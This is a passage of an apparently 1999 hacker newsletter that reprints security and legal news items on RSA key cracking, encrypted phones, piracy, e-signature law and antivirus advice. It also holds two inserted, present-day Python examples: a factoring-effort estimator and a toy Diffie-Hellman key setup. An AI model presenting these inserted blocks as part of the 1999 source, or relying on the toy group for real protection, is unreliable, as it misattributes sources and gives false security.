So most IT students study to become programmers or Windows NT experts, while security specialists tend to get their training on the job, said Paul Jansen, manager of information security at loan guarantor and administration company USA Group Inc. in Indianapolis. When he hires, "I'm hiring other companies' security people," he said. If more universities offer security training, "I'm going to get people who have a better understanding of what our profession is all about," Jansen said.

Throughout the industry, companies are having a tough time hiring IT workers with security skills. "I consider the need dire," said Richard Power, editorial director at the Computer Security Institute in San Francisco.

Salary issues, in particular, make it hard for federal agencies to compete with the private sector. Government IT workers often start at salaries of less than $25,000, and the federal security plan recommends improving pay.

There is "fierce competition" for IT workers with security skills, said Timothy Grance, manager of systems and network security at the National Institute of Standards and Technology. But a pay-for-performance salary program and the promise of working on research projects have been hiring incentives, he said.

@HWA

41.0 SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Saturday 14th August 1999 on 5:00 am CET

The passage of the Copyright Amendment (Computer Programs) Bill 1999, legislation passed yesterday, will allow software engineers to decompile computer software in limited circumstances to develop interoperable products. Read more below.
Consumers and computer industry benefit from copyright changes

Senator the Hon Richard Alston
Minister for Communications, the Information Economy and the Arts

The Hon Daryl Williams AM QC
Attorney-General

JOINT NEWS RELEASE
13 August 1999

Consumers will have greater choice in computer software and Australian-developed software will be more internationally competitive as a result of new legislation passed yesterday.

The Attorney-General, the Hon Daryl Williams AM QC MP and Senator the Hon Richard Alston, Minister for Communications, Information Technology and the Arts announced today that passage of the Copyright Amendment (Computer Programs) Bill 1999 will allow software engineers to decompile computer software in limited circumstances so they can develop interoperable products.

Currently software copyright owners can block this type of decompilation as an infringement of copyright. New laws mean developers will be able to decompile software to find this vital interface information if it is not readily available. Overseas developers have been able to do this for some time, particularly in Europe and the United States of America where Australia's main competitors in this sector are located.

The amendments to the Copyright Act confirm that the Australian Government is committed to creating an environment that is conducive to increasing the competitiveness of Australian business and providing choice for consumers. The legislation also recognises that Australia's information industries underpin competitiveness of other industry sectors, particularly in the global economy.

The legislation also makes changes to the Copyright Act important for the development of the information economy in Australia. The information age brings with it new threats to our safety and security - such as computer viruses and increasing incidence of unauthorised access to valuable information stored digitally.
The legislation will help companies protect their valuable digital assets by providing another tool with which to deal with these threats.

In recognition of the importance of resolving the year 2000 computer date (Y2K) problem, the legislation will operate retrospectively for error correction to the date of the announcement of the Government's decision, 23 February 1999.

Decompilation of a program will be allowed without the copyright owner's permission for interoperability or security testing only if the information on the program's interfaces or on ensuring system security is not readily available. Information derived from decompilation of a program about its interfaces with other software or about errors in a defective copy, including Y2K problems, or which is required for testing system security cannot be used or communicated to others for any other purpose, without the copyright owner's permission.

The severe penalties for copyright piracy will continue to apply. These penalties comprise up to $60,500 and/or five years in prison for each offence by an individual and up to $302,500 for each offence by a corporation.

Media Contacts:
Nicholas Harford, Mr Williams' office (02) 6277 7300
Terry O'Connor, Senator Alston's office (02) 6277 7480

@HWA

42.0 IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 4:50 am CET

In a bid to bolster e-commerce security, the Irish government has introduced legislation that would criminalize the fraudulent use of e-signatures, subjecting violators to possible imprisonment and fines in excess of US$100,000. Under the extensive proposed legislation, e-signature documents and contracts will be afforded the same legal status as their paper counterparts. Info on 32bitsOnline.
http://www.32bitsonline.com/news.php3?news=news/199908/nb199908135&page=1

Ireland Intends To Criminalize E-Signature Fraud
By: David McGuire
Date: 08/13/99
Location: WASHINGTON, DC, U.S.A.

In a bid to bolster e-commerce security, the Irish government has introduced legislation that would criminalize the fraudulent use of e-signatures, subjecting violators to possible imprisonment and fines in excess of US$100,000.

"The (European Union) is expected to come out with an e-signature directive and we've beat them (to it) with our own," Ken Thompson, spokesperson for the Irish embassy in Washington, DC, told Newsbytes today.

Under the extensive proposed legislation, "e-signature documents and contracts will be afforded the same legal status as their paper counterparts," Thompson said.

The ultimate goal of the legislation, which is expected to be passed into law before Christmas, is to heighten e-commerce security using the "lightest regulatory touch" possible, Thompson said.

The legislation was proposed by Ireland's Department of Public Enterprise and should encounter no significant obstacles in becoming law, Thompson said. Under Irish parliamentary structure, bills that enjoy the support of the majority party are essentially assured of passage.

Full text of the proposed legislation is located online at http://www.ecommercegov.ie/ .

Earlier this month, the US House of Representatives' Committee on Commerce approved by unanimous voice vote the Electronic Signatures in Global and National (E-SIGN) Commerce Act, H.R. 1714.

H.R. 1714 would legalize the use of digital signatures, making them as legally binding as a hand-signed John Hancock. The bill also establishes federal rules for digital signatures, replacing a patchwork of different state regulations.

@HWA

43.0 ISRAEL AND PIRACY
~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 4:00 am CET

The whole of Israel shares the same disk, goes the joke.
But Israel's almost getting placed on the Office of the United States Trade Representative's infamous Priority Foreign Country List for its alleged illegal activities is no laughing matter. According to the annual global report jointly prepared by the Software and Information Industries Association (SIIA) and the Business Software Alliance (BSA), 48 percent of software used in 1998 in Israel was illegal and this has to change. Wired.

Piracy Rampant in Israel
by Tania Hershman
3:00 a.m. 13.Aug.99.PDT

JERUSALEM -- When is a Microsoft Intellimouse not a Microsoft Intellimouse? When it's one of the several thousands of fake mice recently seized by police from an Israeli warehouse.

The whole of Israel -- government included -- is sharing one disk, goes the joke. But for manufacturers big and small, Israelis' predilection for piracy, of software and music as well as hardware, is no laughing matter.

Israel is dangerously close to being placed on the Office of the United States Trade Representative's infamous Priority Foreign Country List for its alleged illegal activities. New Justice Minister Yossi Beilin, visiting the United States this week, announced that he will be trying to appease the powers-that-be in order to avoid the next step -- sanctions.

According to the annual global report jointly prepared by the Software and Information Industries Association (SIIA) and the Business Software Alliance (BSA), 48 percent of software used in 1998 in Israel was illegal, which represents lost revenues of US$63 million. While Israel does not top the list -- in Russia, for example, the figure is closer to 90 percent -- the United States is particularly upset with Israel because the government appears to be doing nothing.

There may be a reason for this. "The government is one of the biggest of the software industry's customers, and they are using illegal software," says Ami Fleischer, Israel's representative to the BSA.
"But when we say illegal software, this doesn't mean that there is a government official going down to the flea market," he added. The situation is euphemistically called 'under-licensing' or 'overworking,' meaning the number of licenses falls below the number of copies being used. On a wider scale, the Israeli public is not averse to "borrowing" software, believing that the chances of being caught are slim to none. "Bill Gates can afford it, right?" laughed one offender. Microsoft is not the only target: Other, smaller software houses with all their hopes riding on one product are being hit much harder. This culture of acceptable piracy may be rooted in the bootleg Hebrew music trade. At the central bus station in Tel Aviv, illegal cassettes and CDs of Israel's top artists are hawked openly. The damage done to this small local industry has been sufficient to warrant a national ad campaign featuring gagged Israeli singers. Israeli piracy is not limited to Israel's borders. Illegal copies are making their way abroad, too. "The figure of 48 percent doesn't show the whole picture. That doesn't get into the export issue. Forty-eight percent is a low estimate," said Keith Kupferschmidt, the SIIA's intellectual property counsel in Washington. Kupferschmidt has a word of advice for new prime minister Ehud Barak. "Whenever there is a high piracy rate there is a problem with people's understanding of what it is acceptable to do," he said. "If you have people in government whose job it is to crack down on piracy and the government devotes resources, we would see a different attitude." New legislation is in the works to modernize a copyright law dating back to 1911. According to Sandra Azancot, legal advisor on intellectual property law at Israel's Ministry of Justice, "The new legislation is a much more modern law, with a lot of clarification and strengthening." For example, the punishment for criminal offenses will now be five years instead of three. 
During his US visit this week, Justice Minister Beilin is talking up this legislation, as well as the new antipiracy police unit set up a few months ago. He will also be pointing to the fact that only three years ago 75 percent of software in Israel was illegal, over 50% higher than today.

Yes, big organizations have smartened up their act, said the BSA's Ami Fleischer, but among small businesses with smaller pockets -- half of the Israeli business sector -- piracy is at the 80 percent mark. "People must understand that paying for software is part of the financial costs [of the company]," he stresses.

With its thousands of high-tech start-ups Israel likes to think of itself as another Silicon Valley. But this won't last long if it allows potential technological and business allies to be ripped off.

The Office of the US Trade Representative, which normally surveys the situation every April, is holding an extraordinary review in December of the Israeli government's progress. If it is not impressed, Israel will have six months to comply with certain conditions, says Fleischer, "and then the federal government will be obliged to impose sanctions."

@HWA

44.0 OUTSIDE HELP ISN'T WANTED
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Saturday 12th August 1999 on 3:58 pm CET

Retired Cobol programmers will not be needed to help in building Y2K prepared systems. The vice president of communications at the Information Technology Association of America said: "We've seen many companies do much more work on this issue with internal staff than [was] originally thought earlier on". If you are wondering why Cobol programmers are important to solving the Y2K bug, go here.

http://default.net-security.org/1/03.htm

@HWA

45.0 HACKER MYTHOLOGY
~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by BHZ, Saturday 12th August 1999 on 3:51 pm CET

ZDNet did a piece from this year's WebSec security conference.
"The image of the hacker as a romantic, dangerous figure is pervasive, even in high-tech industries. Vendors promote such an image to sell security products. Hackers and wannabes promote it for the mystique". (Article not found - Ed) @HWA 46.0 DEFAULT ISSUE #1 ~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 13th August 1999 on 7:01 pm CET We are proud to announce that Default - Help Net Security newsletter is available to our readers. First issue covers: Last week's news on Help Net Security, Y2K: As the millennium approaches, A look into basic cryptography, The history of Zero Knowledge Systems, Telecommunications 101, Macintosh security: How to make your mac a babel tower, Computing: A closer look at hard- and software, An approach to Linux System Security, Infection & Vaccination, Spam: The problems with junk e-mail, Freedom of speech - related incidents, Meet the underground and a Guest column. So go to Default web-site (http://default.net-security.org) and start reading :) @HWA 47.0 MICROSOFT AND AOL ~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 13th August 1999 on 6:57 pm CET Microsoft employee impersonated a private technology consultant and sent an e-mail accusing AOL of irresponsible behavior in the battle over instant messaging. Microsoft officials didn't comment on it yet, but Richard Smith, security expert who received this e-mail said that Microsoft confirmed that the e-mail came from their employee. Contributed by ZaP. @HWA 48.0 INTERVIEW WITH ERIC RAYMOND ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 13th August 1999 on 6:45 pm CET ZDNet has published an interview with Eric Raymond, a programmer who supports open source movement which gave birth to the Linux operating system. He describes himself as "an anthropologist of the loosely knit community of developers who, on their own, have tinkered away at the increasingly popular alternative OS". 
Read the interview with Raymond (url not found)

@HWA

49.0 CODE-CRACKING COMPUTER CAUSES CONCERN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 2:00 am CET

Adi Shamir, one of the developers of the RSA encryption method, says he has designed a computer that could crack open a file encoded using RSA in only a few days. Needless to say, with RSA being one of the most widely used encryption methods, such a computer could jeopardize the privacy of the bulk of electronic commerce as practiced today. Full story.

Code-cracking computer causes concern

WORCESTER, Mass. (AP) -- A developer of one of the most widespread computer encryption systems said Thursday he has designed a computer that could crack open a file encoded using the most common form of data encryption in only a few days.

If built -- at an estimated cost of about $2 million -- such a computer could jeopardize the privacy of the bulk of electronic commerce as practiced today, according to cryptographers at the conference where the design was shown.

Most highly sensitive military, banking and other data are protected by stronger encryption keys beyond its reach. The commonly used weaker keys, though, would become ''easy to break for large organizations,'' said cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot, Israel. He developed both the new computer design and helped invent the widespread coding system -- known as RSA public-key encryption -- that it cracks.

Shamir spoke at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic Institute. Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key -- a sequence of 1s and 0s, or bits -- unlocks the secret coding of a computer transmission so it can be deciphered.
Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine, and also refers to the twinkle of its light-emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA encryption keys faster than ever -- within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and several months.

Shamir first informally showed a prototype of his device at a conference in Prague, the Czech Republic, in May. He publicly outlined its workings at length for the first time Thursday.

''Twinkle is a little out there, but it looks like it's buildable to me,'' said Seth Goldstein, an expert in computer architecture at Pittsburgh's Carnegie Mellon University.

Organized crime, friendly and unfriendly governments, research institutions and others might take an interest in such a project, conference participants suggested. In any event, users of 512-bit keys ''should be worried,'' said Christof Paar, a computer engineer at Worcester Polytechnic Institute. ''In the current state of the art, it is not secure,'' added Bob Silverman, a research scientist at Bedford, Mass.-based RSA Laboratories, a division of RSA Data Security, which Shamir co-founded but where he no longer works.

Longer keys, such as 1,024-bit, are already employed for many sensitive communications. But, out of intelligence and other concerns, the U.S. government requires special permission to export software with the longer keys. The most popular browsers are normally set to just 512 bits.

Brian Snow, a technical director for information security at the National Security Agency, spoke to the conference Thursday about weak quality assurance in commercial security products, but declined to answer press questions.

Longer keys are harder to set up and take more computer power to operate.
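To put the key lengths in the AP story on one scale, here is an added illustration (not from the article and not from Shamir's Twinkle design): it takes the story's two data points, a 465-bit key done by hundreds of machines over months and a 512-bit key estimated at two or three days on a Twinkle-class effort, and applies the standard heuristic running time of the general number field sieve to see what the same effort buys against a 1,024-bit key. The NFS constant, the dropped o(1) term and the policy minimum in the last function are assumptions; the numbers are order-of-magnitude, not a benchmark.

```python
"""How factoring effort grows with RSA modulus length (added example).

Uses the heuristic GNFS running time L_n[1/3, c] = exp(c (ln n)^(1/3)
(ln ln n)^(2/3)) with c = (64/9)^(1/3), ignoring the o(1) term, so the
ratios below are rough. Nothing here is taken from the article beyond
its bit lengths and time estimates.
"""
import math

NFS_C = (64 / 9) ** (1 / 3)   # about 1.923, the GNFS exponent constant (assumed heuristic)


def nfs_log_work(bits: int) -> float:
    """Natural log of the GNFS work estimate for a modulus of the given bit length."""
    ln_n = bits * math.log(2)
    return NFS_C * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3)


def nfs_work_ratio(bits_from: int, bits_to: int) -> float:
    """How many times more work a bits_to modulus costs than a bits_from modulus."""
    return math.exp(nfs_log_work(bits_to) - nfs_log_work(bits_from))


def scaled_days(base_bits: int, base_days: float, target_bits: int) -> float:
    """Days for target_bits if base_bits takes base_days at the same throughput."""
    return base_days * nfs_work_ratio(base_bits, target_bits)


def key_length_verdict(bits: int, min_bits: int = 2048) -> str:
    """Policy check a key audit would apply; 1024 is where the article places
    'longer keys', min_bits is an assumed present-day policy floor."""
    if bits < 1024:
        return "reject: short-key class the article describes as breakable"
    if bits < min_bits:
        return "reject: below policy minimum"
    return "accept"


if __name__ == "__main__":
    print(f"512 vs 465 bits: {nfs_work_ratio(465, 512):.1f}x more work")
    print(f"1024 vs 512 bits: {nfs_work_ratio(512, 1024):.2e}x more work")
    years = scaled_days(512, 3, 1024) / 365
    print(f"3 days at 512 bits scales to about {years:.0f} years at 1024 bits")
    for b in (512, 1024, 2048):
        print(b, key_length_verdict(b))
```

The point the ratio makes is the one the cryptographers quoted in the story are making: the jump from 465 to 512 bits is only a handful of times more work, while 512 to 1,024 bits is millions of times more, so the same two-million-dollar effort does not scale to the "longer keys" in any useful time.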
Such power may be scarce in the wireless telephones, home appliances and other computerized conveniences of the future, cryptographers said.

@HWA

50.0 HACKING YOUR WAY TO AN IT CAREER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 1:30 am CET

It's no secret that talented hackers often end up in IT-related jobs. David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco, presented hacker career workshops at the Chaos Computer Camp last weekend. Here are some of his tips. Interesting note: according to Del Torto, talented programmers are preceded by their reputation in the small IT security community, and he won't hire or recommend people who don't act responsibly. It's all about the ethics, eh? So what would you do?

(Online News, 08/12/99 05:34 PM)

Hacking your way to an IT career
By Ann Harrison

ALTLANDSBERG, GERMANY -- At the first annual Chaos Communication Camp, which took place outside of Berlin last weekend (see story), hundreds of hackers and their machines filled the main hack tent exchanging information on the latest exploits and security tools. Most were young, skillful and in demand by corporate information technology departments. The camp, which attracted some of the most talented European and American hackers, was one of the largest hacker gatherings in Europe so far this year.

David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco, agreed. He noted that hackers like himself were working at all the top five auditing and accounting firms. Del Torto presented hacker career workshops with titles such as "Take This Job and Ping It/Hacking The Corporate Ladder For Fun & Profit."

The following are some of the tips he offered hackers seeking corporate jobs:

- Write your own job description.
- Volunteer for a project in your area of expertise.
- Network with people.
- Start your own company.
- Or sign on to another start-up.

He also advised the crowd to build tools they themselves would use ("You should be customer No. 1!"), license technology when appropriate and solve problems with free software or generate it. "When building reputation capital, it's pretty important to learn to think like the boss,'' he said.

In addition to his day job, Del Torto is a member of the Cypherpunks, a San Francisco-based hacking organization that produces what he calls "no-compromise" security technology.

Del Torto had advice for his Fortune 1000 brethren, too. Asked if young hackers, who may not be partial to suits and ties, are discriminated against, Del Torto recalled that Dan Farmer, author of the widely used Satan network scanning tool, was once turned down by a prospective employer who found his appearance unsettling. He urged IT managers to avoid superficial judgments and focus on the reputation of the individual. IT managers interviewing young people who "act differently" should remember when they were young, he advised.

Del Torto noted that in the relatively small community of IT security professionals, people are preceded by their reputations. He said he knows programmers who are talented, but he won't hire or recommend them because they don't act responsibly.

@HWA

51.0 BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 1:00 am CET

Baltimore Technologies expects to ship an encryption and digital signature tool kit that will let users secure documents based on XML later this fall. The X/Secure tool kit will be able to encrypt XML and allow users to authenticate recipients by digital signatures. Read more.
Baltimore Technologies to ship encryption tool for XML docs
By Ellen Messmer
Network World
Posted at 8:45 AM PT, Aug 12, 1999

Baltimore Technologies later this fall expects to ship an encryption and digital signature tool kit that will let users secure documents based on XML.

The X/Secure tool kit will let customers encrypt XML documents or use digital signatures to authenticate the identity of the author of the XML content and the intended recipient. Digital signatures let customers check the content of a document to ensure it was not tampered with en route to the designated recipient.

The X/Secure tool kit will be sold to meet two specific development needs, according to Sean Coughlin, Baltimore product manager. The first use would be as a Java-based utility to run on any Java Virtual Machine in order to automatically encrypt or sign XML-based documents and verify signed XML documents. Second, the tool kit would let customers add digital signing and encryption capabilities to XML-based applications.

"We're basing the X/Secure tool kit on the IETF draft specification 'Digital Signatures for XML,' " Coughlin said. The World Wide Web Consortium is also considering this draft specification for inclusion in the suite of XML standards it shepherds, he added. Information about the specification is posted on both groups' Web sites.

Baltimore has not yet set a price for the X/Secure tool kit, which may be sold in two versions when it ships by the end of the third quarter.

Baltimore Technologies Inc., with headquarters in Dublin, Ireland, is at www.baltimoretechnologies.com.

For more information about enterprise networking, go to Network World Fusion at www.nwfusion.com.

Copyright (c) 1999 Network World Inc. All rights reserved.
@HWA

52.0 STARTUP WANTS TO SELL UNTAPPABLE PHONES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 12:40 am CET

Starium Inc plans to be selling telephone scrambling devices so powerful that even the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations. Needless to say, the US government isn't too thrilled about the idea. Wired.

Starium Promises Phone Privacy
by Declan McCullagh
3:00 a.m. 12.Aug.99.PDT

MONTEREY, California -- The sleepy coastal town of Monterey, California, is not the kind of place where vision-fired entrepreneurs come to change the world. Monterey Bay is better known for sea lions than silicon, and for Cannery Row -- made famous half a century ago in John Steinbeck's gritty, eponymous novel.

Today, the third floor of a converted sardine factory on Cannery Row is home to a startup company developing what could become a new world standard in privacy protection.

By early 2000, Starium Inc. plans to begin selling sub-US$100 telephone scrambling devices so powerful that even the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations.

Such heavily armored privacy is currently available only to government and corporate customers who pony up about $3,000 for STU-III secure phones created by the US National Security Agency.

By squeezing the same kind of ultra-strong encryption into a sleek brushed-steel case about twice the size of a Palm V -- and crafted by the same San Francisco designer -- Starium hopes to bring crypto to the masses.

"Americans by nature don't like people reading over their shoulders," says Lee Caplin, president and CEO of Starium.

True enough. But whether Americans will pay extra for privacy is open to question, especially since both people in a conversation need the Starium "handsets" to chat securely.
And there's another big obstacle: The US government has repeatedly tried to keep similar products off the market unless they have a backdoor for surveillance. Its export rules prevent Starium from freely shipping its products overseas.

Starium's three co-founders -- the company has since grown to eight people -- claim they're not fazed. "The technology is out there. Whether they like it or not, it exists," says Bernie Sardinha, Starium chief operations officer. "You cannot stop progress. You cannot stop technology."

Starium at first planned to call its product CallGuard, but abandoned the name after discovering another company owned the trademark. The firm is considering VoiceSafe as another potential name.

Customers will use the device by plugging it into their telephone handset -- a feature allowing it to work with office systems -- and plugging the handset into the base of the phone. At the touch of a "secure" button, the modems inside the two Starium units will form a link that, theoretically, creates an untappable communications channel. The units digitize, compress, filter, and encrypt voice communications -- and reverse the process on the other end.

The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the initial setup, and a 168-bit triple DES algorithm for voice encoding. The four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a smart card port, and possibly serial, USB, and parallel interfaces, the company says. The final version will operate for over 2 hours on a pair of AA batteries.

Starium's business plan is nothing if not ambitious. In addition to selling the portable units, the company wants to add crypto capabilities to cell phones, faxes, and even corporate networks. Target markets include the legal, medical, banking, and even political fields. "I've gotten a call from the George W. Bush people for use in the campaign," CEO Caplin says.
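The article gives the shape of the handset's setup (a Diffie-Hellman exchange, then a 168-bit triple DES key) but not the detail, and it is worth seeing why "theoretically" is the right word for an untappable link. The block below is an added example, not Starium's firmware or anything Blossom published: it runs the two-sided exchange, derives a DES-parity-correct 24-byte key from the shared secret, and adds the one check a bare DH setup needs before it can resist an active relay rather than only a passive wiretap, a short code both callers read to each other that an interposer cannot make agree on both legs. The group parameters, key derivation and code format are all assumptions, and the prime is a small constructed safe prime so the block runs instantly; it is a toy, not a 2,048-bit group, and offers no real protection.

```python
"""Diffie-Hellman setup, 3DES-sized key, spoken check code (added example).

Not Starium's design: the article only states "2,048-bit Diffie-Hellman,
then 168-bit triple DES". Everything else here (toy 64-bit safe prime,
generator 4, SHA-256 key derivation, 6-hex-digit check code) is assumed.
"""
import hashlib
import secrets
from typing import Tuple

_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)  # deterministic below 3.3e24


def is_prime(n: int) -> bool:
    """Miller-Rabin with fixed bases; exact for the sizes used here."""
    if n < 2:
        return False
    for b in _MR_BASES:
        if n % b == 0:
            return n == b
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def find_safe_prime(start: int) -> int:
    """First safe prime p = 2q + 1 with odd q >= start (deterministic, toy-sized)."""
    q = start | 1
    while not (is_prime(q) and is_prime(2 * q + 1)):
        q += 2
    return 2 * q + 1


P = find_safe_prime(1 << 63)   # constructed toy group of ~64 bits; NOT the 2,048-bit group
Q = (P - 1) // 2
G = 4                          # a square mod P, hence a generator of the order-Q subgroup


def valid_peer(y: int) -> bool:
    """Reject 0, +-1 and anything outside the order-Q subgroup (y^Q == 1 mod P)."""
    return 1 < y < P - 1 and pow(y, Q, P) == 1


def des_parity(key: bytes) -> bytes:
    """Set the low bit of each byte so every byte has odd parity, as DES keys expect."""
    return bytes((b & 0xFE) | (bin(b >> 1).count("1") % 2 == 0) for b in key)


class Handset:
    """One endpoint: fresh private exponent per call, then key and check code."""

    def __init__(self) -> None:
        self.x = secrets.randbelow(Q - 2) + 2        # private exponent in [2, Q-1]
        self.public = pow(G, self.x, P)

    def derive(self, peer_public: int) -> Tuple[bytes, str]:
        if not valid_peer(peer_public):
            raise ValueError("peer public value is not in the expected subgroup")
        shared = pow(peer_public, self.x, P)
        secret = shared.to_bytes(16, "big")
        # bind both public values (sorted, so both sides agree) into the check code
        transcript = b"".join(v.to_bytes(16, "big") for v in sorted((self.public, peer_public)))
        key = des_parity(hashlib.sha256(b"demo-3des-key" + secret).digest()[:24])  # 3 x 64 bits
        sas = hashlib.sha256(b"demo-sas" + secret + transcript).hexdigest()[:6]
        return key, sas


def honest_call() -> Tuple[bytes, str, bytes, str]:
    """Two handsets talking directly: keys and check codes agree."""
    a, b = Handset(), Handset()
    key_a, sas_a = a.derive(b.public)
    key_b, sas_b = b.derive(a.public)
    return key_a, sas_a, key_b, sas_b


def relayed_call() -> Tuple[str, str]:
    """A relay completing a separate, valid exchange with each side: audio flows,
    but the two callers now hold different check codes, which is what the
    spoken comparison detects."""
    a, b = Handset(), Handset()
    relay_to_a, relay_to_b = Handset(), Handset()
    _, sas_a = a.derive(relay_to_a.public)
    relay_to_a.derive(a.public)
    _, sas_b = b.derive(relay_to_b.public)
    relay_to_b.derive(b.public)
    return sas_a, sas_b


if __name__ == "__main__":
    _, sas_a, _, sas_b = honest_call()
    print("direct call, codes match:", sas_a == sas_b, sas_a, sas_b)
    r_a, r_b = relayed_call()
    print("relayed call, codes match:", r_a == r_b, r_a, r_b)
```

Two defensive details carry over to any real implementation: the subgroup check in valid_peer refuses the degenerate public values that would pin the shared secret to a known constant, and the check code is bound to the transcript as well as the secret, so it cannot be made to agree by an intermediary that knows neither private exponent.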
The company says it's working on deals with major cell phone manufacturers like Ericsson and Nokia to offer the same voice-scrambling in software. Newer cell phones have enough memory and a fast enough processor to handle the encryption. Best of all, a software upgrade could be free. "You take your phone into a mall or a kiosk and they simply burn in the new flash ROM," Sardinha says.

The idea for Starium came from longtime cypherpunk and company co-founder Eric Blossom, who was inspired by the Clinton administration's now-abandoned Clipper Chip plan to devise a way to talk privately.

"I got interested around the time of Clipper. I was scratching my head saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett Packard and Clarity Software.

Blossom created prototype devices and sold them online. But they were clunky -- about the size of a desktop modem. They were also expensive, and didn't sell very well.

The company's directors include Robert Kohn, former chief counsel for PGP and Borland International, and Whitfield Diffie, distinguished engineer at Sun Microsystems and co-inventor of public key cryptography.

@HWA

53.0 OUTSMARTING THE WILY COMPUTER VIRUS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 12:10 am CET

CNN has yet another story on computer viruses. This one doesn't deal with any specific viruses however, but more with the precautions you can take. Mostly "make backups" and "update your AV-software" stuff you could think up yourself, but oh what the hell :)

Outsmart the wily computer virus
August 11, 1999
Web posted at: 3:21 p.m. EDT (1921 GMT)
by Carla Thornton

(IDG) -- PROBLEM: Even if your PC runs an antivirus program, the risk of a data-destroying infection is real.

SOLUTION: Take a few additional precautions to help keep your computer safe and sound.

Shane Toven never worried about computer viruses.
The chief engineer and IS manager for KAXE-FM in Grand Rapids, Minnesota, knew that the whole staff used antivirus software and practiced "safe computing." Then last April, Chernobyl -- one of the year's deadliest viruses -- slipped past the public radio station's security. Two of the station's Windows 95 machines suffered full meltdown.

"At first, all of our PCs worked fine on April 26, the day Chernobyl was supposed to hit. Then a couple of them quickly ground to a halt," remembers Toven. "When I went to reboot, I got the dreaded 'insert system disk' message. According to Fdisk, there were no partitions and no boot sectors -- classic signs of Chernobyl."

Feeling more than a little sheepish, Toven realized he hadn't updated McAfee VirusScan's signatures, the data files that identify specific viruses. (He was using an older version of the package that could not update itself automatically.) Chernobyl probably sneaked in "through a contaminated file attached to an e-mail from someone we knew," he says. The virus destroyed 2 gigabytes of data, including employee records, correspondence, and other vital files.

Even if you follow the usual safeguards -- installing and updating a good antivirus package, avoiding e-mail attachments from strangers, and never downloading files from the Internet -- your system probably isn't 100 percent safe from viruses. Few of us compute in isolation, never exchanging files with others. New viruses can claim casualties before antivirus vendors identify them. Your best line of defense is to assume your PC will become infected -- and take steps now to save your neck.

Smart precautions

Experts and survivors who've tangled with the nastiest viruses offer the following wisdom:

MAKE UPDATING SIGNATURE FILES EASY: As Toven discovered, the key to warding off most attacks is simply keeping your antivirus software updated.
But remembering to check for new signature files, downloading them, and distributing them to the people who need them can be a hassle. Fortunately, most programs now remind you when signature files need to be updated, and will download the update for you from the company's Web site at the click of a button. The best, including Norton AntiVirus, PC-cillin, and McAfee VirusScan, perform this job automatically as often as once a day.

KEEP A BOOT DISK HANDY: Melissa and other Word and Excel macro viruses that torment most users at one time or another do little serious damage. But an infestation such as Chernobyl may stop your PC from even starting up. That's when you reach for the boot disk -- a floppy from which you can run the antivirus program's scanner if your PC becomes inoperable. Most antivirus packages give you the option of making a boot disk during setup. If yours does not, you can easily make your own, notes Ken Dunham, virus expert at About.com (formerly the Mining Company). Dunham says users can find instructions for creating a start-up disk, plus other virus-related advice, at antivirus.about.com (link below). "You should boot from a clean disk before removing a virus," he says. "Some viruses can't be cleaned any other way."

USE MORE THAN ONE ANTIVIRUS UTILITY: No single antivirus package can detect and remove every virus, so using multiple programs lessens the chance of a virus getting through. "Pay for one commercial package and add one or more free programs," suggests Dunham. "Set the primary package to scan all the time and use the secondary programs only when you need them, so they don't conflict. It's like getting a second opinion from a doctor." Find a list of free antivirus products at antivirus.about.com/library/weekly/aa051099.htm (link below). And pick up extra protection from a free Web-based scanning service like Trend Micro's HouseCall or Network Associates' McAfee Clinic (links below).
